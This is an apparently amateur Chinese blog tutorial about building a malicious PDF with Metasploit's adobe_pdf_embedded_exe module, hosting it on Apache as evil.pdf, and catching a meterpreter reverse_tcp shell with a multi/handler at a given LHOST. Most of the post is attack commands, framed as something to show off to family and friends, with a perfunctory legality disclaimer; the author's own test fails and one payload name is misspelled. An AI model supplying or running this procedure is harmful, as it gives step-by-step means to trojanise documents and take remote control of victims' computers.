提示:我们8月28号开学,所以我得快点更新了,不能拖了😥
文章目录
- 前言
- 一、打开终端
- 总结
前言
PDF文件被广泛应用于共享信息,电子邮件,网站或文档或存储系统的真实链接
它可以用于恶意软件的载体。
不要问我什么意思?我的意思是PDF文件可以入侵你的电脑,是的,这很简单
学会这个您可以向您的家人,朋友,炫耀 (我是大黑阔,我好厉害呀)
当然,前提是不要用于违法活动,如果您进行了,您会在几分钟之内,进监狱,然后看不了我的文章了不能向家人炫耀了。
我不唠叨了,让我们开始吧
(这前言写的真好)
提示:以下是本篇文章非正文内容,下面案例请勿进行违法活动
一、打开终端
输入
msfconsole
然后输入这个:
use exploit/windows/fileformat/adobe_pdf_embedded_exe
我们得配置,输入
show options
输入:
set payload windows/x64/meterpreter/erverse_tcp
这将是他们所使用的ip
输入
show options
这是恶意PDF文件名,看完了吗?看完了我们继续
输入:
exploit
文件创建在哪里了?看这里。
是不是很麻烦,又要开权限,拿文件我们使用mv,输入
mv /root/.msf4/local/evil.pdf /var/www/html/evil.pdf
然后让我们打开apache服务,输入:
systemctl start apache2.service
让我再炫耀一次,输入这个
systemctl status apache2.service
这个是用来检查apache服务状态,然后就没了,这基本上是开了网络服务器。
这是Windows11,作为目标,当然,这是我的电脑,我很想用同学的电脑,当目标,他们害怕我,所以就用我的
打开浏览器输入您的IP/文件名
您会发现,啊,直接打开了,对的,您需要邮件,然后保存到桌面就行了
回到攻击机,输入:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
坚持住,我们还差一个
set LHOST 192.168.0.140
然后输入
exploit
好吧,又出事故了,我打开文件了,却连接不了
我检查了很多遍,这跟我笔记上写的对啊?
总结
翻车了
